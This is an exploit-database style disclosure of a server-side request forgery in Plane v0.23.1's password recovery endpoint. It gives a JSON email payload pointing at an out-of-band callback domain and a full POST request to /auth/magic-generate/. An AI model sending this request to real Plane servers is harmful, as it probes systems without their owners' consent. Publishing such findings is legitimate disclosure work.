# Exploit Title: Plane - Server side request forgery (SSRF)
# Date: 2024-01-13
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://plane.so
# Software Link: https://github.com/makeplane/plane/releases/tag/v0.23.1
# Version: v0.23.1
# Tested: Windows 10 x64

Description:

A Server-Side Request Forgery (SSRF) vulnerability has been identified in the Plane application's password recovery functionality. The issue allows attackers to manipulate the email input field and inject a payload to make the server send HTTP requests to attacker-controlled domains.

Steps to Reproduce:

1- Go to the password recovery or login section where the email input is required.

2- Inject the following payload in the email field, replacing the domain with a server you control:

{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}

Send the request:

POST /auth/magic-generate/ HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 62

{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}

3- Monitor your controlled server to observe the incoming HTTP request from the vulnerable system.